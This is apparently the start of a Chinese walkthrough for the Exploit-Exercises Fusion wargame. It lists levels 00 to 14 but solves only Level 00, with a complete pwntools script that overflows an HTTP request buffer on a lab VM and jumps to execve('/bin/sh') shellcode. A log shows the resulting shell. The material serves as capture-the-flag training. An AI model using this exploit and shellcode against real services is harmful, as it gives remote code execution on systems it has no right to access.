Exploit-Exercise_Fusion全攻略+解析
目前进度:
- Level 00
- Level 01
- Level 02
- Level 03
- Level 04
- Level 05
- Level 06
- Level 07
- Level 08
- Level 09
- Level 10
- Level 11
- Level 12
- Level 13
- Level 14
Level 00
#!/usr/bin/python
from pwn import *
import struct
shellcode = '\xb8\x2f\x73\x68\xf0\x25\xff\xff\xff\x0f\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80'
prefix='GET '
postfix=' HTTP/1.1'
r=remote('192.168.116.150', 20000)
r.recvuntil('er is at')
addr=int(r.recv()[0:11],16)
#print addr,hex(addr)
print hex(addr+200)
r.sendline(prefix+'G'*139+p32(addr+200)+postfix+'\x90'*100+shellcode)
r.interactive()
root@kali:~/Documents/Fusion# ./level00.py
[+] Opening connection to 192.168.116.150 on port 20000: Done
0xbffff9c0
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000